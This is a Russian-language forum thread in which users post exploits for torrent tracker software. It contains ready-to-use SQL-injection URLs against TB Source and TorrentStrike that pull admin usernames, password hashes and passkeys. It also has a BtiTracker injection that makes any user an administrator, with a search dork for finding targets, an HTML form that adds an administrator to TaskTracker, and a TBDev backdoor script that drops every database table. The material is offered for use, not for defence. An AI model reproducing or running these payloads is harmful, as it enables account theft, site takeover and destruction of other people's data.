Здесь выкладываем уязвимости трэкер-движков. Я пожалую начну. Уязвимости готовил уже давно на milw0rm-e выкладывать но руки так и не дошли. TB Source <= 0.6 Code: ####################################### # TB Source <= 0.6 reqdetails.php SQL-Injection # Discovered: z01b # Contact: [censored] # Thanx: melco ####################################### -------------------------------------------------- # Details : # Website : http://sourceforge.net/projects/tbsource/ # Vulnerable File : reqdetails.php -------------------------------------------------- Vulnerability: SQL-injection to obtain admin user and hash http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users #29.12.06 TorrentStrike <= 0.4 Code: ####################################### # Torrent Strike <= 0.4 reqdetails.php SQL-Injection # Discovered: z01b # Contact: [censored] # Thanx: melco ####################################### -------------------------------------------------- # Details : # Website : http://sourceforge.net/projects/torrentstrike/ # Vulnerable File : reqdetails.php -------------------------------------------------- SQL querry, for recieving admin user and hash(md5): http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users #29.12.06
BtiTracker <=v1.4.1 Code: ################################################################################# # # BtiTracker <=v1.4.1 Remote SQL Injection Exploit # # Discovered by: m@ge|ozz - [email protected] # Vulnerabitity: Remote Sql Injection / # Problem: Any user can be Administrator # Website Vendor: http://www.btiteam.org # # Vulnerable Code (account_change.php): # # if (isset($_GET["style"])) # @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]); # # if (isset($_GET["langue"])) # @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]); # # PoC: account_change.php?style=2[SQL]&returnto=%2F # # Example to gain admin control: account_change.php?style=1,id_level=8 # # # GoogleDork: "by Btiteam" # # Shoutz: - eVolVe or Die - # ################################################################################# # milw0rm.com [2007-05-22] TaskTracker all versions Code: <!-- ******************************************************************************* # Title : TaskTracker All Version Remote Add Admin Exploit # Author : ajann # Contact : :( # S.Page : http://www.geckovich.com # $$ : $39.99 - $19.99 ******************************************************************************* --> <FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0"> <td valign=top class='data3'> <input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top class='data3'> <input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top class='data3'> <input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top class='data3'> <input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top class='data3'> <select name="GroupID" class="selectedtextboxes"> <option value="1">Publisher</option> <option value="2">Editor</option> <option value="3">Administrator</option> </select> </td> <td valign=middle class='data3' align="center" colspan="2" align="center"> <input type="submit" value="Gonder"> </form> # milw0rm.com [2007-01-01]
TBDev Code: <? require_once("include/bittorrent.php"); dbconn(); if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") { $drops = array(); $result = mysql_query("SHOW TABLES FROM ".$mysql_db.""); while (list($name) = mysql_fetch_array($result)) $drops[] = "`".$name."`"; die("DROP TABLE ".implode(", ", $drops)); echo "Drop tables complete..."; } ?> расхешируеm 0bffd3d87e7267c7fe686e20acbee7ab и узнает соответствующую ему строку [string] может путем запроса http://tracker_url/drop.php?sd=[string] удалить всю информацию из базы установленного трекера Deflector